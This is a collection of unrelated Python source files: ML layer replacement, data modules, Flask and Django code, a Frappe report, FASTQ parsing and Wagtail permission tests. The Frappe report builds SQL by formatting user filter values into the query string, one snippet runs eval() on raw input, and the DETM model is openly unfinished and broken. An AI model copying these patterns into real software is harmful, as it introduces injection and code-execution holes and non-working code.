}
super().__init__(*args, **kwargs)
##################################
# LayerReplacer abstract methods #
##################################
def _apply_replacement(self, layer):
if isinstance(layer, self.keras_module.layers.Conv2D) or isinstance(layer, self.keras_module.layers.Dense):
dct_replacement = dict()
else:
dct_replacement = None
return dct_replacement
def _replace_conv2D(self, layer, dct_compression):
nb_filters = layer.filters
strides = layer.strides
kernel_size = layer.kernel_size
activation = layer.activation
padding = layer.padding
use_bias = layer.use_bias
replacing_layer = MultiConv2D(nb_factors=self.nb_factors, filters=nb_filters, use_bias=use_bias, kernel_size=kernel_size, strides=strides, padding=padding, activation=activation)
if self.final_sparsity != 0:
replacing_layer = sparsity.prune_low_magnitude(replacing_layer, **self.pruning_params)
replacing_weights = None
return replacing_layer, replacing_weights, True
def _replace_dense(self, layer, dct_compression):
hidden_layer_dim = layer.units
activation = layer.activation
use_bias = layer.use_bias
replacing_layer = MultiDense(units=hidden_layer_dim, nb_factors=self.nb_factors, use_bias=use_bias, activation=activation)
if self.final_sparsity != 0:
replacing_layer = sparsity.prune_low_magnitude(replacing_layer, **self.pruning_params)
replacing_weights = None
return replacing_layer, replacing_weights, True
def _set_weights_to_layer(self, replacing_layer, replacing_weights):
if replacing_weights is not None:
raise ValueError("Shouldn't have any weight for replacement.")
else:
return
|
import numpy as np
import statistics as st
"""
Enunciado
Crie uma função que recebe uma lista de números e devolve, nesta ordem, o mínimo, a média, o desvio padrão e o máximo.
Dica: Use a biblioteca statistics (import statistics) para calcular o desvio padrão: desvio = statistics.stdev(lista)
"""
lista = [6, 4, 3, 7, 8, 2, 9, 1]
def recebe_lista(lista):
print(f"Valor mínimo: {min(lista)}")
print(f"Valor médio: {np.mean(lista)}")
print(f"Desvio padrão: {st.stdev(lista):.2f}")
print(f"Valor máximo: {max(lista)}")
recebe_lista(lista)
|
n = int(input())
answer = 0
for _ in range(n) :
exp = input()
answer = max(answer, eval(exp))
print(answer)
|
# -*- coding: utf-8 -*-
# @Time : 2021/3/19 12:18 PM
import traceback
from flask import request, current_app
from werkzeug.exceptions import HTTPException
from app.api import route_api
from common.libs.customException import CustomException
from common.libs.api_result import api_result
@route_api.app_errorhandler(Exception)
def errors(e):
traceback.print_exc()
    # current_app.logger.info('exception type:', str(type(e)))
if isinstance(e, CustomException):
current_app.logger.info('-----CustomException-----')
# tb('-----CustomException-----')
return api_result(code=e.code, message='CustomException:【{}】'.format(str(e.msg)),
data=request.method + ' ' + request.path)
if isinstance(e, HTTPException) and (300 <= e.code < 600):
current_app.logger.info('-----HTTPException-----')
current_app.logger.info('===>path is not found: ' + request.path)
# tb('-----HTTPException-----')
return api_result(code=e.code, message='HTTPException:【{}】'.format(str(e)),
data=request.method + ' ' + request.path)
else:
current_app.logger.info('-----Exception-----')
# tb('-----Exception-----')
return api_result(code=500, message='Exception:【{}】'.format(str(e)), data=request.method + ' ' + request.path)
|
from jsut.corpus import Subtype
from typing import Callable, List, Optional, Union
import pytorch_lightning as pl
from torch import Tensor
from torch.utils.data import random_split, DataLoader
from ...dataset.spectrogram import JSUT_spec
class JSUT_spec_DataModule(pl.LightningDataModule):
"""
JSUT_spec dataset's PyTorch Lightning datamodule
"""
def __init__(
self,
batch_size: int,
download: bool,
subtypes: List[Subtype] = ["basic5000"],
transform: Callable[[Tensor], Tensor] = lambda i: i,
corpus_adress: Optional[str] = None,
dataset_dir_adress: Optional[str] = None,
resample_sr: Optional[int] = None,
):
super().__init__()
self.n_batch = batch_size
self.download = download
self._subtypes = subtypes
self.transform = transform
self.corpus_adress = corpus_adress
self._dataset_dir_adress = dataset_dir_adress
self._resample_sr = resample_sr
def prepare_data(self, *args, **kwargs) -> None:
pass
def setup(self, stage: Union[str, None] = None) -> None:
if stage == "fit" or stage is None:
dataset_train = JSUT_spec(
train=True,
resample_sr=self._resample_sr,
subtypes=self._subtypes,
download_corpus=self.download,
corpus_adress=self.corpus_adress,
dataset_dir_adress=self._dataset_dir_adress,
transform=self.transform,
)
n_train = len(dataset_train)
self.data_train, self.data_val = random_split(
dataset_train, [n_train - 10, 10]
)
if stage == "test" or stage is None:
self.data_test = JSUT_spec(
train=False,
resample_sr=self._resample_sr,
subtypes=self._subtypes,
download_corpus=self.download,
corpus_adress=self.corpus_adress,
dataset_dir_adress=self._dataset_dir_adress,
transform=self.transform,
)
def train_dataloader(self, *args, **kwargs):
return DataLoader(self.data_train, batch_size=self.n_batch)
def val_dataloader(self, *args, **kwargs):
return DataLoader(self.data_val, batch_size=self.n_batch)
def test_dataloader(self, *args, **kwargs):
return DataLoader(self.data_test, batch_size=self.n_batch)
if __name__ == "__main__":
print("This is datamodule/waveform.py")
# If you use batch (n>1), transform function for Tensor shape rearrangement is needed
dm_npVCC_spec = JSUT_spec_DataModule(1, download=True)
# download & preprocessing
dm_npVCC_spec.prepare_data()
# runtime setup
dm_npVCC_spec.setup(stage="fit")
# yield dataloader
dl = dm_npVCC_spec.train_dataloader()
print(next(iter(dl)))
print("datamodule/waveform.py test passed") |
from octis.models.DETM_model import detm
from octis.models.base_etm import BaseETM
from octis.models.DETM_model import data
import torch
import warnings
class DETM(BaseETM):
def __init__(self, num_topics=50, rho_size=300, embedding_size=300, t_hidden_size=800,
activation='relu', train_embeddings=1, eta_nlayers=3, eta_hidden_size=200,
delta=0.005, device='cpu', lr_factor=4.0, lr=0.005, anneal_lr=1, batch_size=100,
num_epochs=100, seed=2019, dropout=0.0, eta_dropout=0.0, clip=0.0,
nonmono=10, optimizer='adam', wdecay=1.2e-6, embeddings_path="", use_partitions=True):
warnings.simplefilter('always', Warning)
warnings.warn("Don't use this because it doesn't work :)",
Warning)
super(DETM, self).__init__()
self.hyperparameters = dict()
self.hyperparameters['num_topics'] = int(num_topics)
self.hyperparameters['num_epochs'] = int(num_epochs)
self.hyperparameters['t_hidden_size'] = int(t_hidden_size)
self.hyperparameters['rho_size'] = int(rho_size)
self.hyperparameters['embedding_size'] = int(embedding_size)
self.hyperparameters['activation'] = activation
self.hyperparameters['eta_nlayers'] = eta_nlayers
self.hyperparameters['eta_hidden_size'] = eta_hidden_size
self.hyperparameters['delta'] = delta
self.hyperparameters['dropout'] = float(dropout)
self.hyperparameters['lr'] = float(lr)
        self.hyperparameters['lr_factor'] = float(lr_factor)
self.hyperparameters['anneal_lr'] = float(anneal_lr)
self.hyperparameters['optimizer'] = optimizer
self.hyperparameters['batch_size'] = int(batch_size)
self.hyperparameters['clip'] = float(clip)
self.hyperparameters['wdecay'] = float(wdecay)
self.hyperparameters['eta_dropout'] = float(eta_dropout)
self.hyperparameters['seed'] = int(seed)
self.hyperparameters['nonmono'] = int(nonmono)
self.hyperparameters['train_embeddings'] = bool(train_embeddings)
self.hyperparameters['embeddings_path'] = embeddings_path
self.device = device
self.early_stopping = None
        # TODO: we need to agree on this
self.test_tokens, self.test_counts = None, None
self.valid_tokens, self.valid_counts = None, None
self.train_tokens, self.train_counts, self.vocab = None, None, None
self.use_partitions = use_partitions
self.model = None
self.optimizer = None
self.embeddings = None
    # are these enough, or do we need more?
def set_model(self, dataset, hyperparameters):
if self.use_partitions:
train_data, validation_data, testing_data = dataset.get_partitioned_corpus(use_validation=True)
data_corpus_train = [' '.join(i) for i in train_data]
data_corpus_test = [' '.join(i) for i in testing_data]
data_corpus_val = [' '.join(i) for i in validation_data]
vocab = dataset.get_vocabulary()
self.vocab = {i: w for i, w in enumerate(vocab)}
vocab2id = {w: i for i, w in enumerate(vocab)}
self.train_tokens, self.train_counts, self.test_tokens, self.test_counts, self.valid_tokens, \
self.valid_counts = self.preprocess(vocab2id, data_corpus_train, data_corpus_test, data_corpus_val)
else:
data_corpus = [' '.join(i) for i in dataset.get_corpus()]
vocab = dataset.get_vocabulary()
self.vocab = {i: w for i, w in enumerate(vocab)}
vocab2id = {w: i for i, w in enumerate(vocab)}
self.train_tokens, self.train_counts = self.preprocess(vocab2id, data_corpus, None)
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.set_default_hyperparameters(hyperparameters)
self.load_embeddings()
## define model and optimizer
self.model = detm.DETM(num_topics=self.hyperparameters['num_topics'],
num_times=self.hyperparameters['num_times'],
vocab_size=len(self.vocab.keys()),
t_hidden_size=int(self.hyperparameters['t_hidden_size']),
eta_hidden_size=int(self.hyperparameters['eta_hidden_size']),
rho_size=int(self.hyperparameters['rho_size']),
emb_size=int(self.hyperparameters['embedding_size']),
theta_act=self.hyperparameters['activation'],
eta_nlayers=self.hyperparameters['eta_nlayers'],
                               delta=self.hyperparameters['delta'],
embeddings=self.embeddings,
train_embeddings=self.hyperparameters['train_embeddings'],
enc_drop=self.hyperparameters['dropout']).to(self.device)
print('model: {}'.format(self.model))
self.optimizer = self.set_optimizer()
def _train_epoch(self, epoch):
"""
Train the model for the given epoch
"""
        # change the way we are loading data to the correct form .. @ask sylvia
train_data_with_time = None
train_data, train_times = data.get_time_columns(train_data_with_time)
self.train_rnn_inp = data.get_rnn_input(
self.train_tokens, self.train_counts, train_times, self.hyperparameters['num_times'], len(self.vocab),
len(self.train_tokens))
self.model.train()
acc_loss = 0
acc_nll = 0
acc_kl_theta_loss = 0
acc_kl_eta_loss = 0
acc_kl_alpha_loss = 0
cnt = 0
indices = torch.randperm(train_data.shape[0])
indices = torch.split(indices, self.hyperparameters['batch_size'])
optimizer = self.set_optimizer()
for idx, ind in enumerate(indices):
optimizer.zero_grad()
self.zero_grad()
data_batch, times_batch = data.get_batch(train_data, ind, self.device,
train_times) # we can use pytorch data loader here
### I comment the following row just because I need to make the code compile :/
# times_batch = get_indices(train_times, times_batch)
sums = data_batch.sum(1).unsqueeze(1)
times_batch = torch.from_numpy(times_batch)
if self.hyperparameters['bow_norm']:
normalized_data_batch = data_batch / sums
else:
normalized_data_batch = data_batch
loss, nll, kl_alpha, kl_eta, kl_theta = self.model.forward(
data_batch, normalized_data_batch, times_batch, self.train_rnn_inp, train_data.shape[0])
loss.backward()
if self.hyperparameters['clip'] > 0:
torch.nn.utils.clip_grad_norm_(self.parameters(), self.hyperparameters['clip'])
optimizer.step()
acc_loss += torch.sum(loss).item()
acc_nll += torch.sum(nll).item()
acc_kl_theta_loss += torch.sum(kl_theta).item()
acc_kl_eta_loss += torch.sum(kl_eta).item()
acc_kl_alpha_loss += torch.sum(kl_alpha).item()
cnt += 1
if idx % self.hyperparameters['log_interval'] == 0 and idx > 0:
cur_loss = round(acc_loss / cnt, 2)
cur_nll = round(acc_nll / cnt, 2)
cur_kl_theta = round(acc_kl_theta_loss / cnt, 2)
cur_kl_eta = round(acc_kl_eta_loss / cnt, 2)
cur_kl_alpha = round(acc_kl_alpha_loss / cnt, 2)
lr = optimizer.param_groups[0]['lr']
print(
'Epoch: {} .. batch: {}/{} .. LR: {} .. KL_theta: {} .. KL_eta: {} .. KL_alpha: {} .. Rec_loss: {} .. NELBO: {}'.format(
epoch, idx, len(indices), lr, cur_kl_theta, cur_kl_eta, cur_kl_alpha, cur_nll, cur_loss))
cur_loss = round(acc_loss / cnt, 2)
cur_nll = round(acc_nll / cnt, 2)
cur_kl_theta = round(acc_kl_theta_loss / cnt, 2)
cur_kl_eta = round(acc_kl_eta_loss / cnt, 2)
cur_kl_alpha = round(acc_kl_alpha_loss / cnt, 2)
lr = optimizer.param_groups[0]['lr']
print('*' * 100)
print(
'Epoch----->{} .. LR: {} .. KL_theta: {} .. KL_eta: {} .. KL_alpha: {} .. Rec_loss: {} .. NELBO: {}'.format(
epoch, lr, cur_kl_theta, cur_kl_eta, cur_kl_alpha, cur_nll, cur_loss))
print('*' * 100)
|
#!/usr/bin/env python3
def read_fastq(infile):
# reading one fastq-record at a time using a generator
name, seq, qual = None, None, None
while True:
line = infile.readline()
if not line:
break
name = line.rstrip()
line = infile.readline()
if not line:
break
seq = line.rstrip()
line = infile.readline()
if not line:
break
# qualname=infile.readline().rstrip()
line = infile.readline()
if not line:
break
qual = line.rstrip()
yield(name, seq, qual)
def read_fastq_paired_end(r1file, r2file):
while True:
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
name1 = line1.rstrip()
name2 = line2.rstrip()
# assert name1.split()[0] == name2.split()[0]
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
seq1 = line1.rstrip()
seq2 = line2.rstrip()
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
qual1 = line1.rstrip()
qual2 = line2.rstrip()
yield(name1, seq1, qual1, name2, seq2, qual2)
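# A minimal usage sketch (the path comes from the command line; run e.g.
# `python this_script.py reads.fastq` -- the file name is a placeholder):
if __name__ == "__main__":
    import sys
    with open(sys.argv[1]) as fh:
        for name, seq, qual in read_fastq(fh):
            print(f"{name}\t{len(seq)}")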
|
# Generated by Django 3.1.7 on 2021-04-29 05:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('patient', '0003_auto_20210429_1259'),
]
operations = [
migrations.RenameField(
model_name='patientuser',
old_name='age',
new_name='birthday',
),
]
|
# Copyright (c) 2013, August Infotech and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import msgprint, _, throw
def execute(filters=None):
if not filters: filters = {}
columns = get_columns(filters)
data = []
entries = get_income_data(filters)
if entries:
for entry in entries:
row = [ entry.income_category, entry.date_of_income, entry.amount]
data.append(row)
return columns, data
def get_columns(filters):
columns = []
columns.append(_("Income Category") + ":Link/Income Category:150")
columns.append(_("Date") + ":Date:100")
columns.append(_("Amount") + ":Currency:170")
return columns
def get_income_data(filters):
conditions, filters = get_conditions(filters)
expense_data = frappe.db.sql("Select * from `tabIncome` where docstatus < 2 %s order by date_of_income"% conditions, filters, as_dict=1)
if expense_data:
return expense_data
def get_conditions(filters):
conditions = ""
if filters.get("from_date"):
conditions += " and date_of_income >= '{0}' ".format(filters.get("from_date"))
if filters.get("to_date"):
conditions += " and date_of_income <= '{0}'".format(filters.get("to_date"))
if filters.get("income_category"):
conditions += " and income_category = '{0}'".format(filters.get("income_category"))
return conditions, filters
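# For example, filters = {"from_date": "2020-01-01", "income_category": "Rent"} yields the
# condition string " and date_of_income >= '2020-01-01'  and income_category = 'Rent'".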
|
"""
This module contains all functions and classes for reading a response file and pushing it into the database
Functions and Classes
---------------------
"""
from nordb.database import sitechan2sql
from nordb.core import usernameUtilities
from nordb.database import creationInfo
RESPONSE_INSERT = (
"INSERT INTO response "
" (creation_id, file_name, source, stage, description, "
" format, author) "
"VALUES "
" (%s, %s, %s, %s, %s, %s, %s)"
"RETURNING id"
)
PAZ_RESPONSE_INSERT = (
"INSERT INTO paz_response "
" (response_id, scale_factor) "
"VALUES "
" (%s, %s) "
"RETURNING id"
)
POLE_INSERT = (
"INSERT INTO pole "
" (real, imag, real_error, imag_error, paz_id) "
"VALUES "
" (%s, %s, %s, %s, %s) "
)
ZERO_INSERT = (
"INSERT INTO zero "
" (real, imag, real_error, imag_error, paz_id) "
"VALUES "
" (%s, %s, %s, %s, %s) "
)
FAP_RESPONSE_INSERT = (
"INSERT INTO fap_response "
" (response_id) "
"VALUES "
" (%s) "
"RETURNING id"
)
FAP_INSERT = (
"INSERT INTO fap "
" (frequency, amplitude, phase, "
" amplitude_error, phase_error, fap_id) "
"VALUES "
" (%s, %s, %s, %s, %s, %s)"
)
def insertResponse2Database(response, privacy_level = "public"):
"""
Function for inserting the response object to the database
:param Response response: response that will be inserted to the database
"""
conn = usernameUtilities.log2nordb()
cur = conn.cursor()
c_id = creationInfo.createCreationInfo(privacy_level)
response.c_id = c_id
try:
cur.execute(RESPONSE_INSERT, response.getAsList())
response.response_id = cur.fetchone()[0]
if response.response_format == 'fap':
cur.execute(FAP_RESPONSE_INSERT, (response.response_id,))
fap_id = cur.fetchone()[0]
for fap in response.fap:
cur.execute(FAP_INSERT, fap + [fap_id])
elif response.response_format == 'paz':
cur.execute(PAZ_RESPONSE_INSERT, (response.response_id, response.scale_factor))
paz_id = cur.fetchone()[0]
for pole in response.poles:
cur.execute(POLE_INSERT, pole + [paz_id])
for zero in response.zeros:
cur.execute(ZERO_INSERT, zero + [paz_id])
else:
raise Exception("No such response format! ({0})".format(response.response_format))
except Exception as e:
conn.close()
raise e
conn.commit()
conn.close()
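# A minimal usage sketch (comments only; `resp` is assumed to be a Response object built
# by nordb's response-reading utilities, which live outside this module):
#
#     insertResponse2Database(resp)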
|
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This is a small script designed to issue REINDEX TABLE commands to psql."""
import argparse
import os
import sys
# Import 'common.env' to load our Infra PYTHONPATH
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir))
import common.env
common.env.Install()
from common import chromium_utils
def get_database_creds(dbconfig):
print 'reading dbconfig from %s' % dbconfig
values = {}
if os.path.isfile(dbconfig):
execfile(dbconfig, values)
if 'password' not in values:
raise Exception('could not get db password')
return values
def main():
parser = argparse.ArgumentParser(
description='Run a REINDEX TABLE command on postgres.')
parser.add_argument('directory',
help='location of the master to reindex.')
parser.add_argument('--dbconfig-filename', default='.dbconfig',
help='name of the dbconfig, defaults to %(default)s.')
parser.add_argument('--prod', action='store_true',
help='actually execute command instead of just displaying it.')
args = parser.parse_args()
filename = chromium_utils.AbsoluteCanonicalPath(os.path.join(
args.directory, args.dbconfig_filename))
dbconfig = get_database_creds(filename)
cmd = ['psql', '-h', 'localhost', '-U', dbconfig['username'],
'-d', dbconfig['dbname'], '-c',
'REINDEX TABLE buildrequests;']
new_env = os.environ.copy()
new_env['PGPASSWORD'] = dbconfig['password']
if args.prod:
return chromium_utils.RunCommand(cmd, env=new_env)
else:
print 'Would have run %s.' % cmd
print 'If this looks good, re-run with --prod.'
return 0
if __name__ == '__main__':
sys.exit(main())
|
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
from django.urls import reverse
from wagtail.admin.admin_url_finder import AdminURLFinder
from wagtail.documents.models import Document
from wagtail.models import Collection, GroupCollectionPermission
from wagtail.test.utils import WagtailTestUtils
class CollectionInstanceTestUtils:
def setUp(self):
"""
Common setup for testing collection views with per-instance permissions
"""
collection_content_type = ContentType.objects.get_for_model(Collection)
self.add_permission = Permission.objects.get(
content_type=collection_content_type, codename="add_collection"
)
self.change_permission = Permission.objects.get(
content_type=collection_content_type, codename="change_collection"
)
self.delete_permission = Permission.objects.get(
content_type=collection_content_type, codename="delete_collection"
)
admin_permission = Permission.objects.get(codename="access_admin")
self.root_collection = Collection.get_first_root_node()
self.finance_collection = self.root_collection.add_child(name="Finance")
self.marketing_collection = self.root_collection.add_child(name="Marketing")
self.marketing_sub_collection = self.marketing_collection.add_child(
name="Digital Marketing"
)
self.marketing_sub_collection_2 = self.marketing_collection.add_child(
name="Direct Mail Marketing"
)
self.marketing_group = Group.objects.create(name="Marketing Group")
self.marketing_group.permissions.add(admin_permission)
self.marketing_user = self.create_user("marketing", password="password")
self.marketing_user.groups.add(self.marketing_group)
class TestCollectionsIndexViewAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:index"), params)
def test_simple(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/collections/index.html")
# Initially there should be no collections listed
# (Root should not be shown)
self.assertContains(response, "No collections have been created.")
root_collection = Collection.get_first_root_node()
self.collection = root_collection.add_child(name="Holiday snaps")
# Now the listing should contain our collection
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/collections/index.html")
self.assertNotContains(response, "No collections have been created.")
self.assertContains(response, "Holiday snaps")
def test_ordering(self):
root_collection = Collection.get_first_root_node()
root_collection.add_child(name="Milk")
root_collection.add_child(name="Bread")
root_collection.add_child(name="Avocado")
response = self.get()
# Note that the Collections have been automatically sorted by name.
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Avocado", "Bread", "Milk"],
)
def test_nested_ordering(self):
root_collection = Collection.get_first_root_node()
vegetables = root_collection.add_child(name="Vegetable")
vegetables.add_child(name="Spinach")
vegetables.add_child(name="Cucumber")
animals = root_collection.add_child(name="Animal")
animals.add_child(name="Dog")
animals.add_child(name="Cat")
response = self.get()
# Note that while we added the collections at level 1 in reverse-alpha order, they come back out in alpha order.
# And we added the Collections at level 2 in reverse-alpha order as well, but they were also alphabetized
# within their respective trees. This is the result of setting Collection.node_order_by = ['name'].
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Animal", "Cat", "Dog", "Vegetable", "Cucumber", "Spinach"],
)
class TestCollectionsIndexView(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
self.login(self.marketing_user, password="password")
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:index"), params)
def test_marketing_user_no_permissions(self):
response = self.get()
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_with_change_permission(self):
# Grant the marketing group permission to make changes to their collections
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.change_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertNotContains(response, "Finance")
self.assertNotContains(response, "Add a collection")
def test_marketing_user_with_add_permission(self):
# Grant the marketing group permission to add to their collections
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertNotContains(response, "Finance")
self.assertContains(response, "Add a collection")
def test_marketing_user_with_delete_permission(self):
# Grant the marketing group permission to add to their collections
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.delete_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertNotContains(response, "Finance")
self.assertNotContains(response, "Add a collection")
def test_marketing_user_with_add_permission_on_root(self):
# Grant the marketing group permission to add to root collection
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.root_collection,
permission=self.add_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
# (Root should not be shown)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Finance", "Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertContains(response, "Add a collection")
class TestAddCollectionAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
self.root_collection = Collection.get_first_root_node()
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:add"), params)
def post(self, post_data={}):
return self.client.post(reverse("wagtailadmin_collections:add"), post_data)
def test_get(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertContains(response, self.root_collection.name)
def test_post(self):
response = self.post(
{
"name": "Holiday snaps",
"parent": self.root_collection.id,
}
)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was created and is a child of root
self.assertEqual(Collection.objects.filter(name="Holiday snaps").count(), 1)
self.assertEqual(
Collection.objects.get(name="Holiday snaps").get_parent(),
self.root_collection,
)
class TestAddCollection(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
self.login(self.marketing_user, password="password")
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:add"), params)
def post(self, post_data={}):
return self.client.post(reverse("wagtailadmin_collections:add"), post_data)
def test_marketing_user_no_permissions(self):
response = self.get()
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_with_add_permission(self):
# Grant the marketing group permission to manage their collection
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
response = self.post(
{
"name": "Affiliate Marketing",
"parent": self.marketing_collection.id,
}
)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was created and is a child of Marketing
self.assertEqual(
Collection.objects.filter(name="Affiliate Marketing").count(), 1
)
self.assertEqual(
Collection.objects.get(name="Affiliate Marketing").get_parent(),
self.marketing_collection,
)
def test_marketing_user_cannot_add_outside_their_hierarchy(self):
# Grant the marketing group permission to manage their collection
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
# This user can't add to root collection
response = self.post(
{
"name": "Affiliate Marketing",
"parent": self.root_collection.id,
}
)
self.assertEqual(
response.context["form"].errors["parent"],
["Select a valid choice. That choice is not one of the available choices."],
)
class TestEditCollectionAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.user = self.login()
self.root_collection = Collection.get_first_root_node()
self.collection = self.root_collection.add_child(name="Holiday snaps")
self.l1 = self.root_collection.add_child(name="Level 1")
self.l2 = self.l1.add_child(name="Level 2")
self.l3 = self.l2.add_child(name="Level 3")
def get(self, params={}, collection_id=None):
return self.client.get(
reverse(
"wagtailadmin_collections:edit",
args=(collection_id or self.collection.id,),
),
params,
)
def post(self, post_data={}, collection_id=None):
return self.client.post(
reverse(
"wagtailadmin_collections:edit",
args=(collection_id or self.collection.id,),
),
post_data,
)
def test_get(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Delete collection")
def test_cannot_edit_root_collection(self):
response = self.get(collection_id=self.root_collection.id)
self.assertEqual(response.status_code, 404)
def test_admin_url_finder(self):
expected_url = "/admin/collections/%d/" % self.l2.pk
url_finder = AdminURLFinder(self.user)
self.assertEqual(url_finder.get_edit_url(self.l2), expected_url)
def test_get_nonexistent_collection(self):
response = self.get(collection_id=100000)
self.assertEqual(response.status_code, 404)
def test_move_collection(self):
self.post({"name": "Level 2", "parent": self.root_collection.pk}, self.l2.pk)
self.assertEqual(
Collection.objects.get(pk=self.l2.pk).get_parent().pk,
self.root_collection.pk,
)
def test_cannot_move_parent_collection_to_descendant(self):
response = self.post({"name": "Level 2", "parent": self.l3.pk}, self.l2.pk)
self.assertEqual(
response.context["message"],
"The collection could not be saved due to errors.",
)
self.assertContains(response, "Please select another parent")
def test_rename_collection(self):
data = {"name": "Skiing photos", "parent": self.root_collection.id}
response = self.post(data, self.collection.pk)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was edited
self.assertEqual(
Collection.objects.get(id=self.collection.id).name, "Skiing photos"
)
class TestEditCollection(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
# Grant the marketing group permission to edit their collection
self.users_change_permission = GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.change_permission,
)
# Grant the marketing group permission to add collections under this collection
self.users_add_permission = GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
self.login(self.marketing_user, password="password")
def get(self, collection_id, params={}):
return self.client.get(
reverse("wagtailadmin_collections:edit", args=(collection_id,)), params
)
def post(self, collection_id, post_data={}):
return self.client.post(
reverse("wagtailadmin_collections:edit", args=(collection_id,)), post_data
)
def test_marketing_user_no_change_permission(self):
self.users_change_permission.delete()
response = self.get(collection_id=self.marketing_collection.id)
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_no_change_permission_post(self):
self.users_change_permission.delete()
response = self.post(self.marketing_collection.id, {})
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_can_move_collection(self):
# Retrieve edit form and check fields
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
form_fields = response.context["form"].fields
self.assertEqual(type(form_fields["name"].widget).__name__, "TextInput")
self.assertEqual(
type(form_fields["parent"].widget).__name__, "SelectWithDisabledOptions"
)
# Now move the collection and check it did get moved and renamed
self.post(
self.marketing_sub_collection.pk,
{
"name": "New Collection Name",
"parent": self.marketing_sub_collection_2.pk,
},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_sub_collection.pk).name,
"New Collection Name",
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_sub_collection.pk).get_parent(),
self.marketing_sub_collection_2,
)
def test_marketing_user_cannot_move_collection_if_no_add_permission(self):
self.users_add_permission.delete()
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(list(response.context["form"].fields.keys()), ["name"])
def test_marketing_user_cannot_move_collection_if_no_add_permission_post(self):
self.users_add_permission.delete()
self.post(
self.marketing_sub_collection.pk,
{
"name": "New Collection Name",
"parent": self.marketing_sub_collection_2.pk,
},
)
edited_collection = Collection.objects.get(pk=self.marketing_sub_collection.id)
self.assertEqual(edited_collection.name, "New Collection Name")
self.assertEqual(edited_collection.get_parent(), self.marketing_collection)
def test_cannot_move_parent_collection_to_descendant(self):
self.post(
self.marketing_collection.pk,
{
"name": "New Collection Name",
"parent": self.marketing_sub_collection_2.pk,
},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_collection.pk).get_parent(),
self.root_collection,
)
def test_marketing_user_cannot_move_collection_permissions_are_assigned_to(self):
response = self.get(collection_id=self.marketing_collection.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(list(response.context["form"].fields.keys()), ["name"])
self.assertNotContains(response, "Delete collection")
def test_marketing_user_cannot_move_collection_permissions_are_assigned_to_post(
self,
):
